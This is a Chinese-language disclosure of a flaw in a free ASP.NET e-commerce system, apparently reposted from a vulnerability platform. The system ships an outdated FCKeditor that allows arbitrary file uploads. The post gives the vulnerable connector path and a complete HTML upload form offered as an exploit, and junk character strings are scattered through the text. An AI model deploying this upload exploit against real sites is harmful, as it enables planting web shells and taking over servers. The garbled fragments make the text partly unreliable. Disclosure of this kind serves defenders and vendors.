披露状态:2011-07-19: 细节已通知厂商并且等待厂商处理中
6 V& v s% g. d& x3 T/ [ 2011-07-20: 厂商已经主动忽略漏洞,细节向公众公开0 ?- f! [ _, L* a9 O. ~! D6 {0 E& J) }
简要描述:这个号称中国首家ASP.NET免费开源商城购物系统。最新版本是4.7,竟然采用2.4版本以下的fckeditor编辑器。所以可以直接上传任意文件。
2 Y7 E$ g- o- N7 a9 g" E- M+ s 详细说明:其他版本我没测试,估计也是一样的问题2 R9 r/ q/ G8 n/ I# K
http://127.0.0.1/controls/fckedi ... aspx/connector.aspx+ Q5 h+ y3 V ^' l8 R9 f7 y/ F, [
跳转到网站根目录上传任意文件。5 v; s* S5 b% q' u9 F
漏洞证明:如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件0 \& ?8 a- Z( u' n4 k2 }0 n C
<form id="frmUpload" enctype="multipart/form-data" action="http://127.0.0.1/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">+ S( F( |& c! b* G4 z
Upload a new file:<br>) @/ b) k# Q! T; u
<input type="file" name="NewFile" size="50"><br>. { r3 h( |. F, ^6 R' Q
<input id="btnUpload" type="submit" value="Upload">( T3 E9 ?2 M* Z# u) ?2 o, I- B; f
</form> |